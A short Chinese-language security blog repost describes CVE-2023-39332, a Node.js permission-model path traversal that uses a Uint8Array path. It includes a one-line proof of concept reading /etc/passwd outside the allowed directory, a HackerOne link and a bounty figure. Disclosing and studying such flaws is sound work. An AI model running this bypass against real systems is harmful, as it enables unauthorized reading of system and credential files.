看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网,渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。
—
CVE-2023-39332
node:fs
函数允许将路径指定为字符串或 Uint8Array
对象。在Node.js环境中,该 Buffer
类扩展了 Uint8Array
该类。Node.js可防止通过字符串(请参阅 CVE-2023-30584)和 Buffer
对象(请参阅 CVE-2023-32004)进行路径遍历,但不会通过非 Buffer
Uint8Array
对象进行路径遍历。
POC:
$ node --experimental-permission
--allow-fs-read=/tmp/
-p 'fs.readFileSync(new TextEncoder().encode("/tmp/../etc/passwd"))'
<Buffer 72 6f 6f 74 3a 78 3a 30 3a 30 3a 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 6e 6f 62 6f 64 79 3a 78 3a 36 35 35 33 34 3a 36 35 35 33 34 3a 4e ... 2103 more bytes>
原文链接:
https://hackerone.com/reports/2256167
漏洞赏金:3495$
原文始发于微信公众号(道玄网安驿站):价值3495$的路径遍历
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论